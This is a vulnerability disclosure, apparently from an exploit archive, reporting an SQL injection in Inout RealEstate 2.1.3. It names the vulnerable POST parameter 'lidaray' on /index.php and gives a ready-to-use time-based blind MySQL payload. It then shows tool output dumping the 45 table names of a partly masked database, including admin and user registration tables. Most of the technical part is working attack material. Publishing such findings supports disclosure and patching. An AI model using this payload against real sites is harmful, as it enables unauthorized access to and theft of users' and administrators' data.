┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││                                     C r a C k E r                                    ┌┘
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                  [ Vulnerability ]                                   ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                                                                    :
│  Website  : inoutscripts.com                                                           │
│  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        │
│  Software : Inout RealEstate 2.1.3                                                     │
│  Vuln Type: SQL Injection                                                              │
│  Impact   : Database Access                                                            │
│                                                                                        │
│────────────────────────────────────────────────────────────────────────────────────────│
│                                                                                       ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                        :
│ Release Notes:                                                                         │
│ ═════════════                                                                          │
│                                                                                        │
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │
│ data and crash the application or make it unavailable, leading to lost revenue and     │
│ damage to a company's reputation.                                                      │
│                                                                                        │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                      ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
       
	CryptoJob (Twitter) twitter.com/CryptozJob
	   
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                    © CraCkEr 2023                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /index.php

POST parameter 'lidaray' is vulnerable to SQLI

lidaray=[Inject-HERE]

---
Parameter: lidaray (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: lidaray=' AND (SELECT 9508 FROM (SELECT(SLEEP(5)))BNUc) AND 'IpMJ'='IpMJ
---

[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[INFO] fetching tables for database: '*****_realestate'
[INFO] fetching number of tables for database ''*****_realestate'
Database: *****_realestate

[45 tables]
+--------------------------------+
| adcode                         |
| admin_account                  |
| admin_payment_details          |
| agent_list_request_to_user     |
| broker_citymap                 |
| broker_rate                    |
| broker_review                  |
| brokerabusereport              |
| category_property              |
| chat_details                   |
| chat_messages                  |
| checkout_ipn                   |
| countries                      |
| custom_field                   |
| detail_statistics_list         |
| email_templates                |
| enquiry_status                 |
| forgetpassword                 |
| inout_ipns                     |
| invoicegen                     |
| languages                      |
| list_brokermap                 |
| list_images                    |
| list_main                      |
| listopenhouse                  |
| normal_statistics_list         |
| paymentdetailstat              |
| popularsearchlist              |
| ppc_currency                   |
| public_side_media_detail       |
| public_slide_images            |
| recentsearchlist               |
| settings                       |
| sold_listing                   |
| soldlistadd                    |
| traveller_bank_deposit_history |
| user_broker_licenses           |
| user_broker_registration       |
| user_email_verification        |
| user_list_agent_request        |
| user_registration              |
| user_wishlist_mapping          |
| userabusereport                |
| userlistactive                 |
| wish_list                      |
+--------------------------------+

[-] Done